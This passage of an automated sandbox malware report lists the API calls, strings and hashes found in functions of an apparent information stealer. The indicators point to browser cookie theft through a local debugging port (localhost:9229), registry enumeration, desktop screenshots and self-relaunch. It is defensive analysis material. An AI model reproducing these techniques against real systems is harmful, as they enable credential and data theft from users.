                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: ca6687e8d2236c293933d46f808e27a3503c825d27abec0cd500c723ce4cd0d4
                          • Instruction ID: 1d67646afcbddff51af1ed5ab4daccb880e6ef8ddac78a441b86f3223bfb4098
                          • Opcode Fuzzy Hash: ca6687e8d2236c293933d46f808e27a3503c825d27abec0cd500c723ce4cd0d4
                          • Instruction Fuzzy Hash: C5E13970E00629EFDF50DFA8E891ADDBBB6BF48301F1045A9E509A7241DB349E45CFA4
                          APIs
                          • memset.MSVCRT ref: 0063D9A1
                          • memset.MSVCRT ref: 0063D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0063DA1C
                          • lstrcat.KERNEL32(?,0129DA98), ref: 0063DA36
                          • lstrcat.KERNEL32(?,?), ref: 0063DA4A
                          • lstrcat.KERNEL32(?,0129CED8), ref: 0063DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0063DA95
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 983ead807553b9ca5ba43a5e820e6ff39dc043996aac329aef7a65ce466ac239
                          • Instruction ID: 2205de0faeded845f78005fec18f478ebc959f65148fe5adea9f8ff6991cd792
                          • Opcode Fuzzy Hash: 983ead807553b9ca5ba43a5e820e6ff39dc043996aac329aef7a65ce466ac239
                          • Instruction Fuzzy Hash: 38B19FB1D10629AFCB10EFA4EC959EE77BABF48301F044969F946A7240DA349E45CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B3D9
                          • lstrlen.KERNEL32(00654C50), ref: 0062B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B474
                          • lstrcat.KERNEL32(00000000,00654C50), ref: 0062B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0062B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B587
                          • lstrlen.KERNEL32(00654AD4), ref: 0062B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B622
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0062B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B65E
                          • lstrlen.KERNEL32(?), ref: 0062B767
                          • lstrlen.KERNEL32(?), ref: 0062B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: ea5739347be183b842a6a158094189a71fecc20325e6ba4751cf78ba42f1b80e
                          • Instruction ID: d1a88ddb4c27880d786d3a7fc2946bd6378334eab53b83cc818a293734ec421a
                          • Opcode Fuzzy Hash: ea5739347be183b842a6a158094189a71fecc20325e6ba4751cf78ba42f1b80e
                          • Instruction Fuzzy Hash: D3024D70A01A22CFCB25DF65E899AAAB7B2FF44305F18906DE4099B361D735DC42CF80
                          APIs
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • RegOpenKeyExA.ADVAPI32(?,0129B030,00000000,00020019,?), ref: 006437BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006437F7
                          • wsprintfA.USER32 ref: 00643822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00643840
                          • RegCloseKey.ADVAPI32(?), ref: 0064384E
                          • RegCloseKey.ADVAPI32(?), ref: 00643858
                          • RegQueryValueExA.ADVAPI32(?,0129DF60,00000000,000F003F,?,?), ref: 006438A1
                          • lstrlen.KERNEL32(?), ref: 006438B6
                          • RegQueryValueExA.ADVAPI32(?,0129DFD8,00000000,000F003F,?,00000400), ref: 00643927
                          • RegCloseKey.ADVAPI32(?), ref: 00643972
                          • RegCloseKey.ADVAPI32(?), ref: 00643989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: bf7816092e05c894f3796956cdbd1ee406766652b73f0d2c2c08667f03b7adac
                          • Instruction ID: d78d3c953346a860f971ec5aa1e2bd5a5527e7f553f6ac7105c660f5207c53c4
                          • Opcode Fuzzy Hash: bf7816092e05c894f3796956cdbd1ee406766652b73f0d2c2c08667f03b7adac
                          • Instruction Fuzzy Hash: BB91ACB2900218DFCB10DFA4DD809EEBBBAFB48311F148569E509A7351DB35AE45CFA0
                          APIs
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 006290DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006290FC
                          • InternetCloseHandle.WININET(00000000), ref: 00629109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00629166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00629197
                          • InternetCloseHandle.WININET(00000000), ref: 006291A2
                          • InternetCloseHandle.WININET(00000000), ref: 006291A9
                          • strlen.MSVCRT ref: 006291BA
                          • strlen.MSVCRT ref: 006291ED
                          • strlen.MSVCRT ref: 0062922E
                          • strlen.MSVCRT ref: 0062924C
                            • Part of subcall function 00628980: std::_Xinvalid_argument.LIBCPMT ref: 00628996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: f6117dea67ad9f86d294322a921a13b62c4ee2e19f55a524c37abf75fa8bbf1e
                          • Instruction ID: 37b6b0e70f83d129eb8213b9697514066b9dad0e9fc84d45af94df6915527147
                          • Opcode Fuzzy Hash: f6117dea67ad9f86d294322a921a13b62c4ee2e19f55a524c37abf75fa8bbf1e
                          • Instruction Fuzzy Hash: 6551A471600205ABD720DFA8EC45BDEB7BBEF88715F140169F905E3280DBB49A488BA5
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006416A1
                          • lstrcpy.KERNEL32(00000000,0128AFF0), ref: 006416CC
                          • lstrlen.KERNEL32(?), ref: 006416D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006416F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00641704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064172A
                          • lstrlen.KERNEL32(01299B08), ref: 0064173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641762
                          • lstrcat.KERNEL32(00000000,01299B08), ref: 0064176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641792
                          • ShellExecuteEx.SHELL32(?), ref: 006417CD
                          • ExitProcess.KERNEL32 ref: 00641803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: b11fdf4fab290e04a907983371fdb6b3ef98758d09caa5d7ddeb8635ee205ef8
                          • Instruction ID: b7a2ac24e66dce57dc89d9790bee6f7f69b1572508e51f7c3df39acd40d75134
                          • Opcode Fuzzy Hash: b11fdf4fab290e04a907983371fdb6b3ef98758d09caa5d7ddeb8635ee205ef8
                          • Instruction Fuzzy Hash: 45516D7090162AEBDB11DFA5DC94ADEBBFABF48301F044129E505E7351DB34AE418B94
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0063F026
                          • lstrlen.KERNEL32(00000000), ref: 0063F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0063F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0063F081
                          • lstrlen.KERNEL32(?), ref: 0063F094
                          • lstrlen.KERNEL32(00000000), ref: 0063F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0063F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 4a04b53c99ba3c43a8382cf5eda58ce68eec06f667790198a4d173af60ad74d5
                          • Instruction ID: 976f9a18b6622a320e1cec13bf9476c4a70fc5ecd6becb8cd7432099947e1110
                          • Opcode Fuzzy Hash: 4a04b53c99ba3c43a8382cf5eda58ce68eec06f667790198a4d173af60ad74d5
                          • Instruction Fuzzy Hash: E951B031D10616AFCB61AF39EC5AAAE77A6AF54305F04416CF84A9B716DF34DC018BD0
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(01298860,00859BD8,0000FFFF), ref: 0062A026
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062A053
                          • lstrlen.KERNEL32(00859BD8), ref: 0062A060
                          • lstrcpy.KERNEL32(00000000,00859BD8), ref: 0062A08A
                          • lstrlen.KERNEL32(00654C4C), ref: 0062A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A0B2
                          • lstrcat.KERNEL32(00000000,00654C4C), ref: 0062A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062A114
                          • SetEnvironmentVariableA.KERNEL32(01298860,00000000), ref: 0062A12F
                          • LoadLibraryA.KERNEL32(0129D3A8), ref: 0062A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 0070bc9151290c57105d95321fa7666fcb77de85239a8824d34ecf4542e00b1a
                          • Instruction ID: 952fbc866c978538f5f7ef7c05c8d833a5bb1d3c0759834a744a9160573d76a0
                          • Opcode Fuzzy Hash: 0070bc9151290c57105d95321fa7666fcb77de85239a8824d34ecf4542e00b1a
                          • Instruction Fuzzy Hash: 40919B30A01F21DFD7219BE4EC49AA637A7BB54716F444119E805977A2EFB9CD808F82
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063C8A2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0063C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063C932
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 0063C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: e0001e29a51b753a914ec6469e992ca1affe4db147a33d521782b15af7d247e3
                          • Instruction ID: af1db976ebf71bc53cb54f4eac4142589337b0ec12b78d34527c7e7829f67424
                          • Opcode Fuzzy Hash: e0001e29a51b753a914ec6469e992ca1affe4db147a33d521782b15af7d247e3
                          • Instruction Fuzzy Hash: BE61C071D1172AABCB10EFB59845AEE7BBABF09311F040569F841F7341DB3889058BD0
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00640CF0), ref: 00644276
                          • GetDesktopWindow.USER32 ref: 00644280
                          • GetWindowRect.USER32(00000000,?), ref: 0064428D
                          • SelectObject.GDI32(00000000,00000000), ref: 006442BF
                          • GetHGlobalFromStream.COMBASE(00640CF0,?), ref: 00644336
                          • GlobalLock.KERNEL32(?), ref: 00644340
